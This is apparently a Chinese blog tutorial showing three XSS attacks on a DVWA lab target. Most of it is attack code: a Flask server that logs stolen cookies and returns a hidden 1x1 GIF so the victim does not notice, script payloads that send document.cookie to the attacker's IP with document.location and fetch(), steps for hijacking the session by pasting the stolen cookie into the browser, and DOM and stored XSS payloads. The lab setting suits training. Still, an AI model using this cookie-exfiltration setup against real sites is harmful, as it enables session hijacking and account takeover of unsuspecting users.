3种XSS攻击简单案例

1、接收cookie端攻击机上用python写个接收web程序flask

python 复制代码
from flask import Flask, request, Response

app = Flask(__name__)

@app.route('/')
def save_cookie():
    cookie = request.args.get('cookie', '')
    if cookie:
        with open('/root/cookies.txt', 'a') as f:
            f.write(f"{cookie}\n")
    
    # 返回1x1透明GIF(避免被用户察觉)
    return Response(b'GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;',  mimetype='image/gif')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

2、dvwa靶机上进行xss测试(3种方法)

php 复制代码
<script>document.location='http://192.168.168.130/?cookie='+document.cookie;</script>
<script>fetch('http://192.168.168.130/?cookie=' + document.cookie);</script>

3、把获取的cookie中最后一个等号后面的是cookie值,打开火狐按F12,点击存储store,把获取的cookie值替换进去,就能直接打开不用账户密码了

???

dvwa中DOM型注入(直接在xss的dom网址上改后面的default=就能获取cookie)

php 复制代码
http://192.168.168.133/dvwa-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie);</script>

???

dvwa中存储型注入(先按F12把name表单长度改长一点)

name中输入:

php 复制代码
<script>alert(document.cookie);</script>

message中随便输入:Payload

以后每次打开这个存储型页面就会弹cookie出来

相关推荐
很多石头7 小时前
前端img与background-image渲染图片对H5页面性能的影响
前端·css
盖头盖7 小时前
【xss基本介绍】
前端·xss
一枚前端小能手7 小时前
「周更第2期」实用JS库推荐:Rsbuild
前端·javascript
小桥风满袖7 小时前
极简三分钟ES6 - 正则表达式的扩展
前端·javascript
柯南二号7 小时前
【大前端】React 使用 Redux 实现组件通信的 Demo 示例
前端·javascript·react.js
学习3人组7 小时前
React JSX 语法讲解
前端·react.js·前端框架
小高0077 小时前
🚨 2025 最该淘汰的 10 个前端 API!
前端·javascript·面试
一枚前端小能手7 小时前
🎨 页面卡得像PPT?浏览器渲染原理告诉你性能瓶颈在哪
前端·javascript
lssjzmn8 小时前
性能飙升!Spring异步流式响应终极指南:ResponseBodyEmitter实战与架构思考
java·前端·架构